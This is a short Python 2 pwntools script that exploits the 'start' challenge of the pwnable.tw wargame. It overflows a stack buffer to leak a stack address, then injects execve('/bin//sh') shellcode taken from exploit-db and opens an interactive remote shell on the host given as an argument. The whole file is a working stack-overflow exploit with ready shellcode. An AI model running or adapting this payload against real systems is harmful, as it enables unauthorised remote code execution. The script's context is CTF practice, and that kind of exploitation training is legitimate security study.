pwnable-start.py

# requires https://github.com/Gallopsled/pwntools

import sys

if len(sys.argv) != 3:
	print 'Usage: python pwnable-start.py <host> <port>'
	print
	print 'Example: python pwnable-start.py chall.pwnable.tw 10000'
	sys.exit(1)

from pwn import *
context(arch = 'i386', os = 'linux')

r = remote(sys.argv[1], int(sys.argv[2]))

# Query stack address
print 'Querying stack address...'
addr_func_write = '\x08\x04\x80\x87'
payload = ('a' * 20) + addr_func_write[::-1]
print 'Sending {} bytes...'.format(len(payload))
r.send(payload)
sleep(2)
response = r.recv()
print 'Received {} bytes!'.format(len(response))
stack_pointer = hex(int(response[20:24][::-1].encode('hex'), 16) - 4)[2:].decode('hex')
print 'Stack Pointer: 0x{}'.format(stack_pointer.encode('hex'))

# Exploit
print 'Exploiting...'
shell_code_addr = hex(int(stack_pointer.encode('hex'), 16) + 20 + 4)[2:].decode('hex')
print 'Shell Code Pointer: 0x{}'.format(shell_code_addr.encode('hex'))
# Taken from: https://www.exploit-db.com/exploits/42428/
shell_code = '\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80'
exit_code = asm('push 0x804809d\nret')
payload = ('a' * 20) + shell_code_addr[::-1] + shell_code + exit_code
print 'Sending {} bytes...'.format(len(payload))
r.send(payload)
sleep(2)
r.interactive()